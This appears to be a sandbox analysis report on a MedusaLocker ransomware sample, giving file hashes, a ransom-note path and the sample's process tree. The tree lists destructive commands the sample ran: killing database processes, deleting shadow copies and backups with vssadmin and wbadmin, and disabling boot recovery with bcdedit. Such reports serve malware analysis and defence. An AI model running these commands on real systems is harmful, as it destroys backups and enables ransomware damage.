Analysis
-
max time kernel
0s -
max time network
179s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240221-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240221-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
23-02-2024 00:24
Static task
static1
Behavioral task
behavioral1
Sample
33.out
Resource
ubuntu1804-amd64-20240221-en
General
-
Target
33.out
-
Size
1.8MB
-
MD5
3d0c932d0eab4d6c5ce08b9ce2b7d335
-
SHA1
b1058433c97fdee8bbad3e393515b4c5dfb4756a
-
SHA256
f73508dfaf27c9eaeccf20fde21c0292202ad65bf16c4c0c2285fc4f24f933d6
-
SHA512
48f115dd25805ef59c508c7f193dc56c9a0fb7b2798e6628b1a89573e34a1ad1f094f52b508e6e196f6dbc326587a211dfb04ef64226976f66a5e179ae5c847c
-
SSDEEP
24576:SBHZBBnZ7xWVcvcD6U7yZJet53ob5XKh2ZQ21:yBndxWVZD6U7yZAtJob5XC2ZQ21
Malware Config
Extracted
/mnt/How_to_back_files.html
medusalocker
Signatures
-
MedusaLocker
Ransomware with several variants first seen in September 2019.
-
Reads CPU attributes 1 TTPs 1 IoCs
description ioc Process File opened for reading /sys/devices/system/cpu/online 33.out
Processes
-
/tmp/33.out/tmp/33.out1⤵
- Reads CPU attributes
PID:1549 -
/bin/shsh -c "rem Kill \"SQL\""2⤵PID:1551
-
-
/bin/shsh -c "taskkill -f -im sqlbrowser.exe"2⤵PID:1552
-
-
/bin/shsh -c "taskkill -f -im sql writer.exe"2⤵PID:1553
-
-
/bin/shsh -c "taskkill -f -im sqlserv.exe"2⤵PID:1554
-
-
/bin/shsh -c "taskkill -f -im msmdsrv.exe"2⤵PID:1555
-
-
/bin/shsh -c "taskkill -f -im MsDtsSrvr.exe"2⤵PID:1556
-
-
/bin/shsh -c "taskkill -f -im sqlceip.exe"2⤵PID:1557
-
-
/bin/shsh -c "taskkill -f -im fdlauncher.exe"2⤵PID:1558
-
-
/bin/shsh -c "taskkill -f -im Ssms.exe"2⤵PID:1559
-
-
/bin/shsh -c "taskkill -f -im SQLAGENT.EXE"2⤵PID:1560
-
-
/bin/shsh -c "taskkill -f -im fdhost.exe"2⤵PID:1561
-
-
/bin/shsh -c "taskkill -f -im ReportingServicesService.exe"2⤵PID:1562
-
-
/bin/shsh -c "taskkill -f -im msftesql.exe"2⤵PID:1563
-
-
/bin/shsh -c "taskkill -f -im pg_ctl.exe"2⤵PID:1564
-
-
/bin/shsh -c "taskkill -f -impostgres.exe"2⤵PID:1565
-
-
/bin/shsh -c "net stop MSSQLServerADHelper100"2⤵PID:1566
-
-
/bin/shsh -c "net stop MSSQL\$ISARS"2⤵PID:1567
-
-
/bin/shsh -c "net stop MSSQL\$MSFW"2⤵PID:1568
-
-
/bin/shsh -c "net stop SQLAgent\$ISARS"2⤵PID:1569
-
-
/bin/shsh -c "net stop SQLAgent\$MSFW"2⤵PID:1570
-
-
/bin/shsh -c "net stop SQLBrowser"2⤵PID:1571
-
-
/bin/shsh -c "net stop REportServer\$ISARS"2⤵PID:1572
-
-
/bin/shsh -c "net stop SQLWriter"2⤵PID:1573
-
-
/bin/shsh -c "vssadmin.exe Delete Shadows /All /Quiet"2⤵PID:1574
-
-
/bin/shsh -c "wbadmin delete backup -keepVersion:0 -quiet"2⤵PID:1575
-
-
/bin/shsh -c "wbadmin DELETE SYSTEMSTATEBACKUP"2⤵PID:1576
-
-
/bin/shsh -c "wbadmin DELETE SYSTEMSTABACKUP -deleteOldest"2⤵PID:1577
-
-
/bin/shsh -c "wmic.exe SHADOWCOPY /nointeractive"2⤵PID:1578
-
-
/bin/shsh -c "bcdedit.exe /set {default} recoverynabled No"2⤵PID:1579
-
-
/bin/shsh -c "bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures"2⤵PID:1580
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD50cbcb77cc1512f6a7209d03124648adf
SHA1cfe747222652876333f3a1903f165cdbf940674b
SHA256e16581fb1611f823c6600bca87a82fb3c2979c22e06215518f5586b795db761f
SHA5126fc29bb7c76392b13910fb415af420e3bb8a1c26aa0386cd1ba39ae08309493698e9b83eacb21e4d192da685a552a6c9b53240e956c56d97ef20657027373472